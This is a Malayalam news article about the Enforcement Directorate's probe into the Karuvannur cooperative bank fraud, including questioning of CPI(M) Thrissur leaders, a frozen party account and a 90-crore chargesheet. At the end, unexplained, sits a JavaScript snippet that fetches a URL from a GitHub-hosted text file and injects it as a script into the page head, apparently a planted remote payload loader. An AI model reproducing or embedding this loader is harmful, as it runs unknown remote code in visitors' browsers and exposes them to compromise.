കരുവന്നൂർ കേസ് ഇ.ഡി വീണ്ടും വല വിരിക്കുന്നു.

10

സഹകരണ ബാങ്ക് തട്ടിപ്പുകൾ തുടർക്കഥ ആകുമ്പോൾ കരിവന്നൂർ ബാങ്ക് തട്ടിപ്പ് കേസിൽ സിപിഎം തൃശ്ശൂർ ജില്ലാ സെക്രട്ടറി എം എം വർഗീസിനെ എൻഫോഴ്സുമെന്റ് ഡയറക്ടറേറ്റ് ചോദ്യം ചെയ്തു.കരുവന്നൂർ ബാങ്കിൽ സിപിഎമ്മിന് രഹസ്യ അക്കൗണ്ടുകൾ ഉണ്ടായിരുന്നു എന്ന് വിവരത്തിന്റെ അടിസ്ഥാനത്തിൽ ആയിരുന്നു ചോദ്യം ചെയ്യൽ.സംസ്ഥാന സെക്രട്ടറിയേറ്റ് അംഗം പി കെ ബിജു,കോർപ്പറേഷൻ കൗൺസിലർ ഷാജഹാൻ എന്നിവരെയും ഈ മാസം ചോദ്യം ചെയ്തിരുന്നു.ഇതിനിടെ തൃശൂർ ബാങ്ക് ഓഫ് ഇന്ത്യയിൽ ഇൻകം ടാക്സ് നടത്തിയ പരിശോധനയിൽ സിപിഎം തൃശ്ശൂർ ജില്ലാ കമ്മിറ്റിയുടെ അക്കൗണ്ട് പരിശോധിക്കുകയും അതിൽ ഉണ്ടായിരുന്ന അഞ്ചു കോടി പത്തുലക്ഷം രൂപ മരവിപ്പിക്കുകയും ചെയ്തിരുന്നു.ബാങ്ക് ഓഫ് ഇന്ത്യയിൽ ഇങ്ങനെ ഒരു അക്കൗണ്ട് ഉണ്ടായിരുന്ന കാര്യം ഇതിനുമുമ്പ് ഉള്ള ചോദ്യം ഒന്നും അറിയിച്ചിരുന്നില്ല അദ്ദേഹം ഇ.ഡി പറയുന്നത്,മാത്രമല്ല ഈ അക്കൗണ്ടിൽ നിന്നും ഈ മാസം ആദ്യം ഒരു കോടി രൂപ സിപിഎം പിൻവലിച്ചിട്ടുമുണ്ട്.അക്കൗണ്ട് മരവിപ്പിച്ചതിനെതിരെ സിപിഎം രംഗത്ത് വന്നിട്ടുണ്ട്.കരുവന്നൂരിൽ നടന്നത് 90 കോടിയുടെ കളളപ്പണ ഇടപാടാണെന്ന് ഇഡി കുറ്റപത്രത്തിൽ അറിയിച്ചത്. 12,000 പേജുള്ള കുറ്റപത്രത്തിൽ 50 വ്യക്തികളും 5 സ്ഥാപനങ്ങളും ഉൾപ്പെടുന്നു. എകെ ബിജോയാണ് കേസിലെ ഒന്നാം പ്രതി. കരുവന്നൂര്‍ സഹകരണ ബാങ്കില്‍ നിന്ന് മതിയായ ഈടില്ലാതെയാണ് വലിയ തുകകള്‍ വായ്‌പ്പയായി അനുവദിച്ചു. ബാങ്ക് സാമ്പത്തികമായി തകര്‍ന്നതോടെ നിക്ഷേപം നടത്തിയ നിരവധി പേര്‍ പ്രതിസന്ധിയിലായി. പലരുടെയും വീടുകള്‍ ലോണെടുക്കൻ ബാങ്കില്‍ ഈട് വെച്ചതില്‍ ജപ്‌തി നോട്ടീസും നലകുകയും. ഇതേ തുടര്‍ന്ന് ആത്മഹത്യകളടക്കം ഉണ്ടായത് വലിയ ചര്‍ച്ചയാവുകയും ചെയ്‌തു.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)